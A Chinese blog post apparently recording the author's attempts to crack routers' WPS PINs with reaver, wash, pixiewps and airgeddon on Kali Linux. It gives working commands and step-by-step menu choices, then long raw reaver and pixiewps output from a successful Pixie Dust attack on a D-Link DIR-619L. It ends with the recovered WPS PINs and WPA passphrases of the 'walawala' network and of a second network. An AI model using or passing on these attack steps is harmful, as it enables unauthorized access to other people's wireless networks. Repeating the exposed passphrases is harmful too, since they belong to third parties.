貌似普遍使用ar9271 破解 wps pixie dust
貌似和网卡有关,https://www.youtube.com/watch?v=lGm1dXTjcJA用的是rtl8187(曾经卡皇)秒破wps失败!!!
和版本号没什么关系。。。也是新版本pixiewps1.2失败
有成功的~
一位俄罗斯小菜,用airgeddon (v5.14)及新版本pixiewps(1.2)秒破了wps
(https://www.youtube.com/watch?v=fFCo8d7S-d0)
操作:
进入一路回车,选择网卡:2(ar9271)
优势一堆俄文(11个选项):2
黄字提示后,又是回车
接着一闪,按了8(还是上边的11个选项)
这回又出现了13个选项,这回选4
这时自动调用wash,可以自动扫描ap,貌似是自动结束(因为不知道他按atl+F4或是Ctrl+C没)
完事,出现了一个AP列表,他选了其中一个(第十个),输入10
弹出13个选项菜单,选了8
黄字,回车
再回车
这回是调用reaver的pixie dust attack
用12345670试PIN,破了,出结果,显示pixiewps 1.2 密码。
终于窗口写了 close window
第三个 这里又一个rtl8187,用的是pixiewps1.1,依然没成功!!!
第四个 这个使用ar9271 新版pixiewps(1.2),默认攻击失败,反复试验,成功!!!
wash -i wlan0mon
reaver -e TP_LINK_XXX -b xx:xx:xx:xx:xx:xx -c 11 -K 1 -i wlan0mon
受攻击AP WPS Model Name RTL8xxx
最后pixiewps 会提示,可能存在漏洞,尝试跟随 --force参数或一些新的数据集...
貌似wps 厂商应该是realtek ralink和brcom...(待考察)
终于成功了!!!不需要使用pixiewps
AP SSID: 100-301
WPS PIN: 47829657
WPA PSK:13704380818
FAST300R WPS number:7
grep是很好的工具,可以结合wash:
wash -i wlan0mon |grep ""
=====
Reaver Dust Pin Cracked!!!
root@kali:~# reaver -i wlan0mon -vv -K 1 -c 4 -b B0:C5:54:DA:A9:5A
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
[+] Switching wlan0mon to channel 4
[+] Waiting for beacon from B0:C5:54:DA:A9:5A
[+] Associated with B0:C5:54:DA:A9:5A (ESSID: walawala)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 4b:86:6f:2e:76:49:21:ce:56:c2:93:63:3c:b5:a0:b5
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: D-Link Systems
[P] WPS Model Name: DIR-619L
[P] WPS Model Number: DIR-619L
[P] Access Point Serial Number: 20070413-0001
[+] Received M1 message
[P] R-Nonce: 05:84:45:bc:61:91:44:0d:50:ab:73:30:58:c2:d5:d0
[P] PKR: 89:90:3d:aa:c7:52:5a:3e:33:c5:b8:33:a3:1d:bf:a5:3c:95:d4:d4:6f:4c:1b:f5:3f:9b:e8:77:47:d8:72:7b:a9:46:85:f6:83:4b:6a:11:d0:6d:1d:5b:5f:af:70:32:02:4e:f9:d7:5c:bb:45:d8:03:eb:b2:ea:5d:c7:b2:a8:05:9d:f3:7e:93:be:97:c4:d6:60:11:cc:fc:9a:d3:21:f3:b9:4b:5b:79:ae:5d:31:66:3d:7c:41:42:31:df:5a:62:64:70:97:ae:7a:7a:57:43:13:71:01:cc:80:df:c0:7d:45:2e:e6:5d:92:8f:22:28:6c:53:f6:4f:5e:f8:aa:bf:21:4b:c6:9e:37:74:86:37:f2:07:6b:26:b9:7a:6f:50:86:6e:2a:80:3a:5a:e4:0f:d3:9e:50:12:4e:86:38:05:38:c6:34:1a:b7:8a:8a:13:f9:19:f9:61:c0:75:b7:2c:9a:1d:21:d5:5c:14:e7:50:94:c8:53:a8:4d:0f:06
[P] AuthKey: 77:e6:24:e3:4f:d1:8e:57:48:a2:88:de:ee:88:0e:14:bc:8e:9e:c8:4b:eb:14:ec:9e:8b:cb:d5:d6:6d:79:97
[+] Sending M2 message
[P] E-Hash1: d1:61:6f:47:df:93:d1:94:80:ec:a1:23:3c:7b:0b:1e:7a:b7:c4:09:a8:b8:20:87:cb:26:89:d4:d5:34:e3:21
[P] E-Hash2: 11:58:69:bd:7c:9d:3a:8c:18:e9:b1:04:bc:2e:85:a2:39:fb:12:cd:b3:a0:a5:c5:95:88:08:1d:fb:d7:92:a7
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.2
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] [*] Time taken: 0 s 468 ms
[Pixie-Dust]
[Pixie-Dust] [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
[Pixie-Dust]
root@kali:~# pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r 89:90:3d:aa:c7:52:5a:3e:33:c5:b8:33:a3:1d:bf:a5:3c:95:d4:d4:6f:4c:1b:f5:3f:9b:e8:77:47:d8:72:7b:a9:46:85:f6:83:4b:6a:11:d0:6d:1d:5b:5f:af:70:32:02:4e:f9:d7:5c:bb:45:d8:03:eb:b2:ea:5d:c7:b2:a8:05:9d:f3:7e:93:be:97:c4:d6:60:11:cc:fc:9a:d3:21:f3:b9:4b:5b:79:ae:5d:31:66:3d:7c:41:42:31:df:5a:62:64:70:97:ae:7a:7a:57:43:13:71:01:cc:80:df:c0:7d:45:2e:e6:5d:92:8f:22:28:6c:53:f6:4f:5e:f8:aa:bf:21:4b:c6:9e:37:74:86:37:f2:07:6b:26:b9:7a:6f:50:86:6e:2a:80:3a:5a:e4:0f:d3:9e:50:12:4e:86:38:05:38:c6:34:1a:b7:8a:8a:13:f9:19:f9:61:c0:75:b7:2c:9a:1d:21:d5:5c:14:e7:50:94:c8:53:a8:4d:0f:06 -s d1:61:6f:47:df:93:d1:94:80:ec:a1:23:3c:7b:0b:1e:7a:b7:c4:09:a8:b8:20:87:cb:26:89:d4:d5:34:e3:21 -z 11:58:69:bd:7c:9d:3a:8c:18:e9:b1:04:bc:2e:85:a2:39:fb:12:cd:b3:a0:a5:c5:95:88:08:1d:fb:d7:92:a7 -a 77:e6:24:e3:4f:d1:8e:57:48:a2:88:de:ee:88:0e:14:bc:8e:9e:c8:4b:eb:14:ec:9e:8b:cb:d5:d6:6d:79:97 -n 4b:86:6f:2e:76:49:21:ce:56:c2:93:63:3c:b5:a0:b5 --force
l
Pixiewps 1.2
[*] PRNG Seed: 1358756030 (Mon Jan 21 08:13:50 2013 UTC)
[*] Mode: 3 (RTL819x)
[*] PSK1: 5f:3f:e9:93:76:7c:9b:4d:f9:28:46:dd:3d:75:80:ce
[*] PSK2: 57:6d:5b:70:27:4a:74:e5:d4:1f:2b:ae:a2:91:2c:90
[*] E-S1: 79:b4:f4:5f:6b:56:96:a0:3d:b8:af:ac:26:0d:8f:53
[*] E-S2: 79:b4:f4:5f:6b:56:96:a0:3d:b8:af:ac:26:0d:8f:53
[+] WPS pin: 50621101
[*] Time taken: 209 s 164 ms
root@kali:~# reaver -i wlan0mon -vv -c 4 -b B0:C5:54:DA:A9:5A -p 50621101
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
[+] Switching wlan0mon to channel 4
[+] Waiting for beacon from B0:C5:54:DA:A9:5A
[+] Associated with B0:C5:54:DA:A9:5A (ESSID: walawala)
[+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
[+] Trying pin 50621101.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 0d:74:3b:bf:03:5a:cd:6d:16:8c:3d:31:57:95:62:82
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: D-Link Systems
[P] WPS Model Name: DIR-619L
[P] WPS Model Number: DIR-619L
[P] Access Point Serial Number: 20070413-0001
[+] Received M1 message
[P] R-Nonce: a5:e3:cc:b7:8b:76:10:e5:a8:e9:e0:17:b2:05:92:b2
[P] PKR: c1:89:3b:04:b6:a0:04:59:db:6e:22:3c:8f:11:ac:00:bd:72:22:1d:09:2a:7b:9f:ee:17:6f:64:89:05:c3:82:30:a0:ba:08:02:81:36:a4:cb:0e:a8:20:68:18:8d:3f:19:30:e8:80:8c:47:47:a8:86:49:6b:61:a2:4c:48:b9:5f:01:75:fe:10:bc:d3:79:ef:71:fd:7d:bd:6a:8e:83:79:b8:8e:3c:4a:01:43:c6:5b:17:34:d5:3a:fc:16:b8:00:97:ad:cf:20:2b:c4:a5:a1:25:5c:0b:f4:d6:74:89:5d:da:16:5a:8a:bc:bf:36:65:d8:01:e5:bb:37:b2:39:1b:ff:43:57:37:59:9b:ac:18:d3:b1:73:fe:90:e9:96:ca:ad:a5:03:50:d7:fd:79:4d:01:7f:0d:ef:e9:fe:41:61:50:0d:4c:18:cd:ea:ad:a8:39:f3:0d:6f:0c:3b:7f:ed:54:81:a2:22:3c:7e:9d:c7:de:08:70:be:41:dd:07
[P] AuthKey: ca:12:b2:8e:1e:38:7b:69:74:8f:f5:f2:e3:eb:28:f4:44:4a:2b:be:d4:29:14:4a:91:12:14:85:12:60:3e:7e
[+] Sending M2 message
[P] E-Hash1: b5:cf:c6:89:16:d7:4a:7d:c5:fa:e0:27:38:c3:32:e3:12:f4:f4:66:8c:51:f7:91:52:bf:0f:75:4d:c8:c9:d7
[P] E-Hash2: a2:41:e8:18:fb:15:77:3b:cb:cf:54:db:cb:16:ca:31:74:4b:b1:ac:43:51:7b:33:26:60:6e:2b:c3:49:62:a8
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] p2_index set to 1
[+] Pin count advanced: 10001. Max pin attempts: 11000
[+] Trying pin 50621101.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 57:9e:98:59:62:e2:e2:9f:0b:7c:e3:18:13:23:f3:0b
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: D-Link Systems
[P] WPS Model Name: DIR-619L
[P] WPS Model Number: DIR-619L
[P] Access Point Serial Number: 20070413-0001
[+] Received M1 message
[P] R-Nonce: 03:45:7b:a0:d0:3e:fd:fe:1f:af:eb:a7:34:4d:b0:39
[P] PKR: cd:3e:24:9f:f5:db:6c:a9:3b:01:4d:e1:a0:10:b6:52:63:87:f0:df:e9:32:4d:d1:47:69:e9:aa:c7:72:9b:1d:a5:a0:7d:7a:1e:de:49:2c:48:0a:af:c0:28:76:bd:b7:0d:06:9c:be:41:95:e7:29:86:e8:09:01:bb:92:61:a8:6f:bf:52:53:25:63:2b:d6:58:de:2c:51:27:21:0d:b6:5f:f3:3c:59:86:22:ee:15:f8:c6:cf:80:ea:06:bc:57:be:a7:1a:ca:ef:76:f0:46:93:e4:0e:be:ef:af:6d:40:82:72:a1:ed:0c:fa:7d:ea:37:35:e9:e2:da:05:65:08:bf:7c:d8:61:f4:cf:46:50:4c:28:49:ab:c2:b7:6f:be:fa:24:a8:bf:42:c9:3a:9c:e7:6f:0c:30:e4:fb:67:f8:1f:35:55:0a:62:3f:ed:2e:3e:73:85:26:42:6e:ee:2a:fa:08:3d:0d:da:0d:3e:5f:2b:15:4f:fb:0b:86:b4:9c
[P] AuthKey: 50:2a:33:65:ee:dc:86:07:9b:e0:cb:4a:03:bb:52:e6:79:56:fa:03:e8:a1:b7:78:d6:78:e4:4b:77:c7:d8:ba
[+] Sending M2 message
[P] E-Hash1: 5d:7b:5c:55:78:ff:81:88:9f:e3:0c:ef:b9:e4:e9:1e:fc:61:be:a3:44:1d:d4:34:0e:f1:f7:00:ae:93:38:5b
[P] E-Hash2: 3d:ca:3f:58:bb:14:8d:c2:42:7c:e6:d0:90:16:33:e8:ca:dc:2a:03:f2:a9:74:e3:a4:4e:c4:c1:82:f4:39:1e
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 7 seconds
[+] WPS PIN: '50621101'
[+] WPA PSK: '04332226868'
[+] AP SSID: 'walawala'
没有评论:
发表评论